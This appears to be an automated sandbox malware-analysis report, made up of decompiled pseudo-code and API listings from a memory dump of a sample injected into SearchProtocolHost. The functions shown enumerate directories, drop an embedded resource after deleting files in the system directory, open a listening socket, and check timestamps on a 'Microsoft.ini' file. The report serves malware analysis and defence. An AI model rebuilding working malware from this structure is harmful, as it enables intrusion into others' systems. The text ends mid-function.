                                                				long _v136;
                                                				void* _v140;
                                                				signed int _v144;
                                                				signed int _v148;
                                                				signed int _v152;
                                                				long _t58;
                                                				void* _t59;
                                                				char _t61;
                                                				char _t62;
                                                				char _t63;
                                                				void* _t67;
                                                				void* _t68;
                                                				char _t70;
                                                				intOrPtr _t76;
                                                				signed int _t87;
                                                				signed int _t89;
                                                				intOrPtr _t90;
                                                				signed int _t92;
                                                				intOrPtr _t93;
                                                				void* _t94;
                                                				signed int _t101;
                                                				char _t112;
                                                				intOrPtr _t136;
                                                				void _t146;
                                                				char _t157;
                                                				void* _t158;
                                                				intOrPtr _t160;
                                                
                                                				_push(_t87);
                                                				_t146 = __ecx;
                                                				_t170 = __ecx;
                                                				if(__ecx == 0) {
                                                					L31:
                                                					__eflags = 0;
                                                					return 0;
                                                				} else {
                                                					_t58 = E02FAE3C0(__ecx, _t170); // executed
                                                					_t89 = _t87 | 0xffffffff;
                                                					_v136 = _t58;
                                                					_t155 =  ==  ? _t89 : 0; // executed
                                                					_t59 = E02FAE170(__ecx, _t58, 0); // executed
                                                					_t156 =  !=  ? _t89 :  ==  ? _t89 : 0; // executed
                                                					E02FAE320(__ecx,  &_v140, _t59); // executed
                                                					_t157 =  !=  ? _t89 :  !=  ? _t89 :  ==  ? _t89 : 0;
                                                					_t61 = E02FAE280(__ecx,  &_v152);
                                                					_v144 = _v152;
                                                					if(_t61 != 0) {
                                                						L4:
                                                						__eflags = _t61;
                                                						_v144 = 0;
                                                						_t157 =  !=  ? _t89 : _t157;
                                                						__eflags = _t157;
                                                					} else {
                                                						_t61 = E02FAE280(__ecx,  &_v152);
                                                						if(_t61 != 0) {
                                                							goto L4;
                                                						} else {
                                                							_t101 = _v152 << 8;
                                                							_v144 = _v144 + _t101;
                                                							_t89 = _t101 | 0xffffffff;
                                                						}
                                                					}
                                                					_t62 = E02FAE280(_t146,  &_v152);
                                                					_v148 = _v152;
                                                					if(_t62 != 0) {
                                                						L8:
                                                						__eflags = _t62;
                                                						_v148 = 0;
                                                						_t157 =  !=  ? _t89 : _t157;
                                                						__eflags = _t157;
                                                					} else {
                                                						_t62 = E02FAE280(_t146,  &_v152);
                                                						if(_t62 != 0) {
                                                							goto L8;
                                                						} else {
                                                							_v148 = _v148 + (_v152 << 8);
                                                						}
                                                					}
                                                					_t63 = E02FAE280(_t146,  &_v152);
                                                					_v140 = _v152;
                                                					if(_t63 != 0) {
                                                						L12:
                                                						_t90 = 0;
                                                						__eflags = _t63;
                                                						_t157 =  !=  ? 0xffffffff : _t157;
                                                					} else {
                                                						_t63 = E02FAE280(_t146,  &_v152);
                                                						if(_t63 != 0) {
                                                							goto L12;
                                                						} else {
                                                							_t90 = (_v152 << 8) + _v140;
                                                						}
                                                					}
                                                					_v128 = _t90;
                                                					_t112 = E02FAE280(_t146,  &_v152);
                                                					_v140 = _v152;
                                                					if(_t112 != 0) {
                                                						L16:
                                                						_t67 = 0;
                                                						__eflags = _t112;
                                                						_t158 =  !=  ? 0xffffffff : _t157;
                                                					} else {
                                                						_t112 = E02FAE280(_t146,  &_v152);
                                                						if(_t112 != 0) {
                                                							goto L16;
                                                						} else {
                                                							_t67 = (_v152 << 8) + _v140;
                                                						}
                                                					}
                                                					if(_t67 != _t90 || _v148 != 0) {
                                                						L20:
                                                						_t158 = 0xffffff99;
                                                					} else {
                                                						_t184 = _v144;
                                                						if(_v144 != 0) {
                                                							goto L20;
                                                						}
                                                					}
                                                					_t68 = E02FAE320(_t146,  &_v100, _t184);
                                                					_t159 =  !=  ? 0xffffffff : _t158;
                                                					E02FAE320(_t146,  &_v96, _t68);
                                                					_t160 =  !=  ? 0xffffffff :  !=  ? 0xffffffff : _t158;
                                                					_t70 = E02FAE280(_t146,  &_v152);
                                                					_t92 = _v152;
                                                					if(_t70 != 0) {
                                                						L24:
                                                						__eflags = _t70;
                                                						_v124 = 0;
                                                						_t160 =  !=  ? 0xffffffff : _t160;
                                                					} else {
                                                						_t70 = E02FAE280(_t146,  &_v152);
                                                						if(_t70 != 0) {
                                                							goto L24;
                                                						} else {
                                                							_v124 = (_v152 << 8) + _t92;
                                                						}
                                                					}
                                                					_t136 =  *((intOrPtr*)(_t146 + 0xc));
                                                					_t118 = _v136 + _t136;
                                                					_t93 = _v100;
                                                					if(_v136 + _t136 < _v96 + _t93 || _t160 != 0) {
                                                						__eflags =  *((char*)(_t146 + 0x10));
                                                						if( *((char*)(_t146 + 0x10)) != 0) {
                                                							CloseHandle( *(_t146 + 4));
                                                						}
                                                						_push(0x20);
                                                						E02FB0AA1(_t146);
                                                						goto L31;
                                                					} else {
                                                						_t76 = _v136;
                                                						_v132 = _t146;
                                                						_push(0x80);
                                                						_v120 = _t136 - _t93 - _v96 + _t76;
                                                						_v104 = _t76;
                                                						_v8 = _t160;
                                                						 *((intOrPtr*)(_t146 + 0xc)) = _t160;
                                                						_t94 = E02FB5A3B(_t118);
                                                						memcpy(_t94,  &_v132, 0x20 << 2);
                                                						E02FAEC60(_t94);
                                                						return _t94;
                                                					}
                                                				}
                                                 			}

                                                APIs
                                                  • Part of subcall function 02FAE170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE190
                                                  • Part of subcall function 02FAE280: ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,02FAE59A,00000001), ref: 02FAE2A8
                                                • CloseHandle.KERNEL32(?), ref: 02FAE799
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseHandlePointerRead
                                                • String ID:
                                                • API String ID: 3130900363-0
                                                • Opcode ID: eb95aae66116ad16ede7b15707c62f57b2925ad2f68a833786316af71c0b7059
                                                • Instruction ID: 69d0ac74f890486196a3a1fdb680658ae35641e90455416b922fc80b9b340a4f
                                                • Opcode Fuzzy Hash: eb95aae66116ad16ede7b15707c62f57b2925ad2f68a833786316af71c0b7059
                                                • Instruction Fuzzy Hash: 4461F0B5B043019FD755DE29CCA066EB7D2AFC43A4F048E3DEA6587381EB74D9058B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E02FAAA40(void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi) {
                                                				signed int _v12;
                                                				short _v536;
                                                				char _v1056;
                                                				struct _WIN32_FIND_DATAW _v1648;
                                                				signed int _v1649;
                                                				intOrPtr _v1656;
                                                				void* __esi;
                                                				signed int _t32;
                                                				signed int _t36;
                                                				signed int _t37;
                                                				WCHAR* _t38;
                                                				signed int _t43;
                                                				signed int _t44;
                                                				signed int _t46;
                                                				signed int _t50;
                                                				signed int _t51;
                                                				WCHAR* _t55;
                                                				void* _t62;
                                                				intOrPtr* _t64;
                                                				char* _t67;
                                                				char* _t70;
                                                				void* _t74;
                                                				signed int _t75;
                                                				signed int _t76;
                                                				signed int _t77;
                                                				signed int _t78;
                                                				intOrPtr* _t80;
                                                				void* _t81;
                                                				signed int _t82;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t85;
                                                				void* _t86;
                                                
                                                				_t32 =  *0x2fcf008; // 0x93ad1eea
                                                				_v12 = _t32 ^ _t82;
                                                				_v1656 = __edx;
                                                				_t80 = __ecx;
                                                				E02FB3440(__ecx,  &_v536, 0, 0x208);
                                                				_t64 = _t80;
                                                				_t84 = _t83 + 0xc;
                                                				_t74 = _t64 + 2;
                                                				do {
                                                					_t36 =  *_t64;
                                                					_t64 = _t64 + 2;
                                                				} while (_t36 != 0);
                                                				_t81 = wsprintfW;
                                                				_push(_t80);
                                                				_t37 = _t36 & 0xffffff00 |  *((short*)(_t80 + (_t64 - _t74 >> 1) * 2 - 2)) == 0x0000005c;
                                                				_v1649 = _t37;
                                                				_t38 =  &_v536;
                                                				if(_t37 == 0) {
                                                					_push(L"%ws\\*");
                                                				} else {
                                                					_push(L"%ws*");
                                                				}
                                                				wsprintfW(_t38, ??);
                                                				_t85 = _t84 + 0xc;
                                                				_t62 = FindFirstFileW( &_v536,  &_v1648);
                                                				if(_t62 != 0xffffffff) {
                                                					do {
                                                						_t67 = ".";
                                                						_t43 =  &(_v1648.cFileName);
                                                						while(1) {
                                                							_t75 =  *_t43;
                                                							__eflags = _t75 -  *_t67;
                                                							if(_t75 !=  *_t67) {
                                                								break;
                                                							}
                                                							__eflags = _t75;
                                                							if(_t75 == 0) {
                                                								L12:
                                                								_t44 = 0;
                                                							} else {
                                                								_t78 =  *((intOrPtr*)(_t43 + 2));
                                                								_t17 =  &(_t67[2]); // 0x2e0000
                                                								__eflags = _t78 -  *_t17;
                                                								if(_t78 !=  *_t17) {
                                                									break;
                                                								} else {
                                                									_t43 = _t43 + 4;
                                                									_t67 =  &(_t67[4]);
                                                									__eflags = _t78;
                                                									if(_t78 != 0) {
                                                										continue;
                                                									} else {
                                                										goto L12;
                                                									}
                                                								}
                                                							}
                                                							L14:
                                                							__eflags = _t44;
                                                							if(_t44 != 0) {
                                                								_t70 = L"..";
                                                								_t50 =  &(_v1648.cFileName);
                                                								while(1) {
                                                									_t76 =  *_t50;
                                                									__eflags = _t76 -  *_t70;
                                                									if(_t76 !=  *_t70) {
                                                										break;
                                                									}
                                                									__eflags = _t76;
                                                									if(_t76 == 0) {
                                                										L20:
                                                										_t51 = 0;
                                                									} else {
                                                										_t77 =  *((intOrPtr*)(_t50 + 2));
                                                										_t20 =  &(_t70[2]); // 0x2e
                                                										__eflags = _t77 -  *_t20;
                                                										if(_t77 !=  *_t20) {
                                                											break;
                                                										} else {
                                                											_t50 = _t50 + 4;
                                                											_t70 =  &(_t70[4]);
                                                											__eflags = _t77;
                                                											if(_t77 != 0) {
                                                												continue;
                                                											} else {
                                                												goto L20;
                                                											}
                                                										}
                                                									}
                                                									L22:
                                                									__eflags = _t51;
                                                									if(_t51 != 0) {
                                                										__eflags = _v1648.dwFileAttributes & 0x00000010;
                                                										if((_v1648.dwFileAttributes & 0x00000010) != 0) {
                                                											E02FB3440(_t80,  &_v1056, 0, 0x208);
                                                											_t86 = _t85 + 0xc;
                                                											__eflags = _v1649;
                                                											_push( &(_v1648.cFileName));
                                                											_push(_t80);
                                                											_t55 =  &_v1056;
                                                											if(__eflags == 0) {
                                                												_push(L"%ws\\%ws");
                                                											} else {
                                                												_push(L"%ws%ws");
                                                											}
                                                											wsprintfW(_t55, ??);
                                                											E02FAA970(_t62, _t80, __eflags, _v1656,  &_v1056);
                                                											_t85 = _t86 + 0x18;
                                                										}
                                                									}
                                                									goto L28;
                                                								}
                                                								asm("sbb eax, eax");
                                                								_t51 = _t50 | 0x00000001;
                                                								__eflags = _t51;
                                                								goto L22;
                                                							}
                                                							goto L28;
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t44 = _t43 | 0x00000001;
                                                						__eflags = _t44;
                                                						goto L14;
                                                						L28:
                                                						_t46 = FindNextFileW(_t62,  &_v1648);
                                                						__eflags = _t46;
                                                					} while (_t46 != 0);
                                                					FindClose(_t62);
                                                					__eflags = _v12 ^ _t82;
                                                					return E02FB0A5D(_v12 ^ _t82, _t81);
                                                				} else {
                                                					return E02FB0A5D(_v12 ^ _t82, _t81);
                                                				}
                                                			}





































                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileFindFirstwsprintf
                                                • String ID: %ws%ws$%ws*$%ws\%ws$%ws\*
                                                • API String ID: 2655791690-2373285283
                                                • Opcode ID: 0b202757d17b06714c0869c6f77e98634fe18a42ca70e2a92773dcd1b5713fb0
                                                • Instruction ID: 9366a5e6b87a80fba6309ad73b330e795c9d79159a71d2f2570e8783a9c00c6d
                                                • Opcode Fuzzy Hash: 0b202757d17b06714c0869c6f77e98634fe18a42ca70e2a92773dcd1b5713fb0
                                                • Instruction Fuzzy Hash: 54413BB1E402099ADB20EB20CD51FFAB3BBEF556D4F4445EADA0ED7140E7329A5CCA50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E02FA9D90(void* __eflags) {
                                                				char _v8;
                                                				char _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				signed char _v28;
                                                				struct _CRITICAL_SECTION _v52;
                                                				char _v56;
                                                				intOrPtr _v60;
                                                				intOrPtr _v64;
                                                				signed char _v68;
                                                				struct _CRITICAL_SECTION _v92;
                                                				char _v96;
                                                				intOrPtr _v100;
                                                				intOrPtr _v104;
                                                				signed char _v108;
                                                				struct _CRITICAL_SECTION _v132;
                                                				char _v136;
                                                				intOrPtr _v140;
                                                				intOrPtr _v144;
                                                				signed char _v148;
                                                				struct _CRITICAL_SECTION _v172;
                                                				char _v176;
                                                				intOrPtr _v180;
                                                				intOrPtr _v184;
                                                				signed char _v188;
                                                				struct _CRITICAL_SECTION _v212;
                                                				char _v216;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t107;
                                                				intOrPtr _t118;
                                                				intOrPtr _t124;
                                                				intOrPtr _t126;
                                                				intOrPtr _t128;
                                                				intOrPtr _t130;
                                                				intOrPtr _t132;
                                                				signed char _t135;
                                                				signed char _t137;
                                                				signed char _t139;
                                                				signed char _t141;
                                                				signed char _t143;
                                                				intOrPtr _t159;
                                                				void* _t165;
                                                				signed char _t167;
                                                				intOrPtr _t184;
                                                				intOrPtr _t185;
                                                				intOrPtr _t186;
                                                				intOrPtr _t187;
                                                				intOrPtr _t188;
                                                				intOrPtr _t189;
                                                				intOrPtr _t190;
                                                				intOrPtr _t198;
                                                				void* _t199;
                                                				signed int _t200;
                                                				signed int _t204;
                                                				signed int _t205;
                                                				signed int _t206;
                                                				signed int _t207;
                                                				signed int _t208;
                                                				signed int _t211;
                                                				signed int _t212;
                                                				void* _t213;
                                                				void* _t214;
                                                				void* _t216;
                                                
                                                				_t216 = __eflags;
                                                				_push(0xffffffff);
                                                				_push(E02FC4781);
                                                				_push( *[fs:0x0]);
                                                				_t214 = _t213 - 0xc8;
                                                				_push(_t165);
                                                				_push(_t199);
                                                				_t107 =  *0x2fcf008; // 0x93ad1eea
                                                				_push(_t107 ^ _t212);
                                                				 *[fs:0x0] =  &_v16;
                                                				_v216 = 0x2fccbac;
                                                				InitializeCriticalSection( &_v212);
                                                				_v188 = 0;
                                                				_v184 = 0;
                                                				_v180 = 0;
                                                				_v8 = 0;
                                                				_v56 = 0x2fccbac;
                                                				InitializeCriticalSection( &_v52);
                                                				_v28 = 0;
                                                				_v24 = 0;
                                                				_v20 = 0;
                                                				_v176 = 0x2fccbac;
                                                				InitializeCriticalSection( &_v172);
                                                				_v148 = 0;
                                                				_v144 = 0;
                                                				_v140 = 0;
                                                				_v96 = 0x2fccbac;
                                                				InitializeCriticalSection( &_v92);
                                                				_v68 = 0;
                                                				_v64 = 0;
                                                				_v60 = 0;
                                                				_v136 = 0x2fccbac;
                                                				InitializeCriticalSection( &_v132);
                                                				_v108 = 0;
                                                				_v104 = 0;
                                                				_v100 = 0;
                                                				_v8 = 4;
                                                				E02FA9B40( &_v136,  &_v96);
                                                				E02FA9740(_t165,  &_v176,  &_v56, _t199);
                                                				E02FA98C0(_t165,  &_v216, _t199, _t216);
                                                				_t118 = _v24;
                                                				_t200 = 0;
                                                				if(_t118 != 0) {
                                                					_t189 = _v64;
                                                					asm("o16 nop [eax+eax]");
                                                					do {
                                                						_t167 = 0;
                                                						_t211 = 0;
                                                						if(_t189 == 0) {
                                                							L11:
                                                							_t190 = 0;
                                                							__eflags = _t200 - _t118;
                                                							if(__eflags < 0) {
                                                								_t190 =  *((intOrPtr*)(_v28 + _t200 * 4));
                                                							}
                                                							E02FA9A20(_t167, _t190, _t200, _t211, __eflags);
                                                							_t189 = _v64;
                                                						} else {
                                                							while(1) {
                                                								_t198 = 0;
                                                								if(_t200 < _t118) {
                                                									_t198 =  *((intOrPtr*)(_v28 + _t200 * 4));
                                                								}
                                                								_t159 = 0;
                                                								if(_t211 < _t189) {
                                                									_t159 =  *((intOrPtr*)(_v68 + _t211 * 4));
                                                								}
                                                								E02FB7612(_t200, _t211, _t159, _t198);
                                                								_t189 = _v64;
                                                								_t214 = _t214 + 8;
                                                								_t167 =  ==  ? 1 : _t167 & 0x000000ff;
                                                								_t211 = _t211 + 1;
                                                								if(_t211 >= _t189) {
                                                									break;
                                                								}
                                                								_t118 = _v24;
                                                							}
                                                							__eflags = _t167;
                                                							if(_t167 == 0) {
                                                								_t118 = _v24;
                                                								goto L11;
                                                							}
                                                						}
                                                						_t118 = _v24;
                                                						_t200 = _t200 + 1;
                                                						__eflags = _t200 - _t118;
                                                					} while (_t200 < _t118);
                                                				}
                                                				E02FA9CC0( &_v176, 0x2fd5ba8);
                                                				E02FA9CC0( &_v136, 0x2fd5ba8);
                                                				E02FA9CC0( &_v56, 0x2fd5bd0);
                                                				E02FA9CC0( &_v216, 0x2fd5bd0);
                                                				E02FA9CC0( &_v96, 0x2fd5bd0);
                                                				_t124 = _v184;
                                                				_t204 = 0;
                                                				__eflags = _t124;
                                                				if(_t124 != 0) {
                                                					do {
                                                						_t188 = 0;
                                                						__eflags = _t204 - _t124;
                                                						if(_t204 < _t124) {
                                                							_t188 =  *((intOrPtr*)(_v188 + _t204 * 4));
                                                						}
                                                						_push(0x100);
                                                						E02FB0AA1(_t188);
                                                						_t124 = _v184;
                                                						_t204 = _t204 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t204 - _t124;
                                                					} while (_t204 < _t124);
                                                				}
                                                				_v184 = 0;
                                                				E02FA6EF0( &_v216);
                                                				_t126 = _v24;
                                                				_t205 = 0;
                                                				__eflags = _t126;
                                                				if(_t126 != 0) {
                                                					do {
                                                						_t187 = 0;
                                                						__eflags = _t205 - _t126;
                                                						if(_t205 < _t126) {
                                                							_t187 =  *((intOrPtr*)(_v28 + _t205 * 4));
                                                						}
                                                						_push(0x100);
                                                						E02FB0AA1(_t187);
                                                						_t126 = _v24;
                                                						_t205 = _t205 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t205 - _t126;
                                                					} while (_t205 < _t126);
                                                				}
                                                				_v24 = 0;
                                                				E02FA6EF0( &_v56);
                                                				_t128 = _v144;
                                                				_t206 = 0;
                                                				__eflags = _t128;
                                                				if(_t128 != 0) {
                                                					do {
                                                						_t186 = 0;
                                                						__eflags = _t206 - _t128;
                                                						if(_t206 < _t128) {
                                                							_t186 =  *((intOrPtr*)(_v148 + _t206 * 4));
                                                						}
                                                						_push(0x100);
                                                						E02FB0AA1(_t186);
                                                						_t128 = _v144;
                                                						_t206 = _t206 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t206 - _t128;
                                                					} while (_t206 < _t128);
                                                				}
                                                				_v144 = 0;
                                                				E02FA6EF0( &_v176);
                                                				_t130 = _v64;
                                                				_t207 = 0;
                                                				__eflags = _t130;
                                                				if(_t130 != 0) {
                                                					do {
                                                						_t185 = 0;
                                                						__eflags = _t207 - _t130;
                                                						if(_t207 < _t130) {
                                                							_t185 =  *((intOrPtr*)(_v68 + _t207 * 4));
                                                						}
                                                						_push(0x100);
                                                						E02FB0AA1(_t185);
                                                						_t130 = _v64;
                                                						_t207 = _t207 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t207 - _t130;
                                                					} while (_t207 < _t130);
                                                				}
                                                				_v64 = 0;
                                                				E02FA6EF0( &_v96);
                                                				_t132 = _v104;
                                                				_t208 = 0;
                                                				__eflags = _t132;
                                                				if(_t132 != 0) {
                                                					asm("o16 nop [eax+eax]");
                                                					do {
                                                						_t184 = 0;
                                                						__eflags = _t208 - _t132;
                                                						if(_t208 < _t132) {
                                                							_t184 =  *((intOrPtr*)(_v108 + _t208 * 4));
                                                						}
                                                						_push(0x100);
                                                						E02FB0AA1(_t184);
                                                						_t132 = _v104;
                                                						_t208 = _t208 + 1;
                                                						_t214 = _t214 + 8;
                                                						__eflags = _t208 - _t132;
                                                					} while (_t208 < _t132);
                                                				}
                                                				_v104 = 0;
                                                				E02FA6EF0( &_v136);
                                                				_v136 = 0x2fccbac;
                                                				DeleteCriticalSection( &_v132);
                                                				_t135 = _v108;
                                                				__eflags = _t135;
                                                				if(_t135 != 0) {
                                                					L02FB5A36(_t135);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v96 = 0x2fccbac;
                                                				DeleteCriticalSection( &_v92);
                                                				_t137 = _v68;
                                                				__eflags = _t137;
                                                				if(_t137 != 0) {
                                                					L02FB5A36(_t137);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v176 = 0x2fccbac;
                                                				DeleteCriticalSection( &_v172);
                                                				_t139 = _v148;
                                                				__eflags = _t139;
                                                				if(_t139 != 0) {
                                                					L02FB5A36(_t139);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v56 = 0x2fccbac;
                                                				DeleteCriticalSection( &_v52);
                                                				_t141 = _v28;
                                                				__eflags = _t141;
                                                				if(_t141 != 0) {
                                                					L02FB5A36(_t141);
                                                					_t214 = _t214 + 4;
                                                				}
                                                				_v216 = 0x2fccbac;
                                                				DeleteCriticalSection( &_v212);
                                                				_t143 = _v188;
                                                				__eflags = _t143;
                                                				if(_t143 != 0) {
                                                					_t143 = L02FB5A36(_t143);
                                                				}
                                                				 *[fs:0x0] = _v16;
                                                				return _t143;
                                                 			}

                                                APIs
                                                • InitializeCriticalSection.KERNEL32(73B76490,93AD1EEA), ref: 02FA9DD2
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E04
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E2C
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E57
                                                • InitializeCriticalSection.KERNEL32(?), ref: 02FA9E7C
                                                  • Part of subcall function 02FA9B40: new.LIBCMT ref: 02FA9BAB
                                                  • Part of subcall function 02FA9740: GetSystemDirectoryA.KERNEL32 ref: 02FA97A9
                                                  • Part of subcall function 02FA9740: DeleteFileA.KERNEL32(?), ref: 02FA97EF
                                                  • Part of subcall function 02FA9740: DeleteFileA.KERNEL32(?), ref: 02FA97F8
                                                  • Part of subcall function 02FA9740: FindResourceA.KERNEL32(00000000,00000065,BIN), ref: 02FA9803
                                                  • Part of subcall function 02FA9740: SizeofResource.KERNEL32(00000000,00000000,77109EB0), ref: 02FA9817
                                                  • Part of subcall function 02FA9740: LoadResource.KERNEL32(00000000,00000000), ref: 02FA9822
                                                  • Part of subcall function 02FA9740: LockResource.KERNEL32(00000000), ref: 02FA9829
                                                  • Part of subcall function 02FA9740: WaitForSingleObject.KERNEL32(00000000,00007530), ref: 02FA986B
                                                  • Part of subcall function 02FA98C0: new.LIBCMT ref: 02FA99A6
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA0E8
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA105
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA128
                                                • DeleteCriticalSection.KERNEL32(?), ref: 02FAA148
                                                • DeleteCriticalSection.KERNEL32(73B76490), ref: 02FAA16B
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CriticalSection$Delete$Initialize$Resource$File$DirectoryFindLoadLockObjectSingleSizeofSystemWait
                                                • String ID:
                                                • API String ID: 2718288186-0
                                                • Opcode ID: 34bb44b9b572548942e72b719623cdba26360db0ee63af17c37cc1b29204e891
                                                • Instruction ID: f4c421eb1bc936f0c6b3cbbd88d5231320e93aea8f27e6700caffc29f5081db6
                                                • Opcode Fuzzy Hash: 34bb44b9b572548942e72b719623cdba26360db0ee63af17c37cc1b29204e891
                                                • Instruction Fuzzy Hash: EAB130B0E002299BDF14DFA4CD90BDEB7B9AF04784F5144A9DA45B7240EB709E49CFA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02FA8ED9
                                                • htons.WS2_32(?), ref: 02FA8F14
                                                • htonl.WS2_32(00000000), ref: 02FA8F29
                                                • bind.WS2_32(?,?,00000010), ref: 02FA8F3E
                                                • listen.WS2_32(?,00000005), ref: 02FA8F50
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: bindhtonlhtonslistensocket
                                                • String ID:
                                                • API String ID: 3517227109-0
                                                • Opcode ID: fe1db960b4bd993aad4321326016b4631e1a557472fc7ff775ef412b562725e5
                                                • Instruction ID: c64601ffe68bd6a86859d47e9708af2cf338a6f17a1ba9b8e7b3e7df87238fe2
                                                • Opcode Fuzzy Hash: fe1db960b4bd993aad4321326016b4631e1a557472fc7ff775ef412b562725e5
                                                • Instruction Fuzzy Hash: E4118F70E40309EBDB10DFB4D909BEFB7F4EF05750F60466AE905AB280EB719A109B84
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 86%
                                                			E02FAA3B0(void* __ebx, void* __ecx, signed int __edx, void* __edi) {
                                                				signed int _v8;
                                                				short _v532;
                                                				short _v1052;
                                                				struct _FILETIME _v1060;
                                                				struct _FILETIME _v1068;
                                                				struct _FILETIME _v1076;
                                                				struct _FILETIME _v1084;
                                                				struct _FILETIME _v1092;
                                                				struct _FILETIME _v1100;
                                                				void* __esi;
                                                				signed int _t38;
                                                				void* _t50;
                                                				int _t61;
                                                				void* _t69;
                                                				void* _t72;
                                                				signed int _t83;
                                                				signed int _t94;
                                                				void* _t96;
                                                				void* _t97;
                                                				void* _t98;
                                                				void* _t99;
                                                				void* _t100;
                                                				signed int _t103;
                                                
                                                				_t95 = __edi;
                                                				_t94 = __edx;
                                                				_t38 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t38 ^ _t103;
                                                				_t99 = __ecx;
                                                				E02FB3440(__edi,  &_v532, 0, 0x208);
                                                				_t100 = wsprintfW;
                                                				wsprintfW( &_v532, L"%ws\\%ws", _t99, L"Microsoft.ini");
                                                				E02FB3440(_t95,  &_v1052, 0, 0x208);
                                                				wsprintfW( &_v1052, L"%ws.log",  &_v532);
                                                				_t50 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0, 0);
                                                				if(_t50 == 0xffffffff) {
                                                					L14:
                                                					__eflags = _v8 ^ _t103;
                                                					return E02FB0A5D(_v8 ^ _t103, _t100);
                                                				} else {
                                                					_t101 = CloseHandle;
                                                					CloseHandle(_t50);
                                                					_v1092.dwLowDateTime = 0;
                                                					_v1092.dwHighDateTime = 0;
                                                					_v1100.dwLowDateTime = 0;
                                                					_v1100.dwHighDateTime = 0;
                                                					_v1060.dwLowDateTime = 0;
                                                					_v1060.dwHighDateTime = 0;
                                                					_v1068.dwLowDateTime = 0;
                                                					_v1068.dwHighDateTime = 0;
                                                					_v1076.dwLowDateTime = 0;
                                                					_v1076.dwHighDateTime = 0;
                                                					_v1084.dwLowDateTime = 0;
                                                					_v1084.dwHighDateTime = 0;
                                                					_t96 = CreateFileW( &_v1052, 0x80000000, 1, 0, 2, 0x80, 0);
                                                					if(_t96 == 0xffffffff) {
                                                						L13:
                                                						__eflags = _v8 ^ _t103;
                                                						return E02FB0A5D(_v8 ^ _t103, _t101);
                                                					} else {
                                                						_t61 = GetFileTime(_t96,  &_v1092,  &_v1060,  &_v1076);
                                                						_push(_t96);
                                                						if(_t61 != 0) {
                                                							CloseHandle();
                                                							DeleteFileW( &_v1052);
                                                							_t97 = CreateFileW( &_v532, 0x80000000, 1, 0, 3, 0x80, 0);
                                                							__eflags = _t97 - 0xffffffff;
                                                							if(_t97 != 0xffffffff) {
                                                								GetFileTime(_t97,  &_v1100,  &_v1068,  &_v1084);
                                                								CloseHandle(_t97);
                                                							}
                                                							asm("sbb eax, [ebp-0x424]");
                                                							_t98 = E02FC4470(_v1060.dwLowDateTime - _v1068.dwLowDateTime, _v1060.dwHighDateTime, 0x2710, 0);
                                                							_t101 = _v1076.dwLowDateTime - _v1084.dwLowDateTime;
                                                							_t83 = _t94;
                                                							asm("sbb ecx, [ebp-0x434]");
                                                							_t69 = E02FC4470(_v1076.dwLowDateTime - _v1084.dwLowDateTime, _v1076.dwHighDateTime, 0x2710, 0);
                                                							__eflags = _t83 - _t94;
                                                							if(__eflags < 0) {
                                                								L9:
                                                								_t69 = _t98;
                                                								_t94 = _t83;
                                                							} else {
                                                								if(__eflags <= 0) {
                                                									__eflags = _t98 - _t69;
                                                									if(_t98 <= _t69) {
                                                										goto L9;
                                                									}
                                                								}
                                                							}
                                                							_t72 = E02FC4470(E02FC4470(E02FC4470(_t69, _t94, 0x3e8, 0), _t94, 0x3c, 0), _t94, 0x3c, 0);
                                                							__eflags = _t94;
                                                							if(__eflags < 0) {
                                                								goto L13;
                                                							} else {
                                                								if(__eflags > 0) {
                                                									goto L14;
                                                								} else {
                                                									__eflags = _t72 - 0x48;
                                                									if(_t72 > 0x48) {
                                                										goto L14;
                                                									} else {
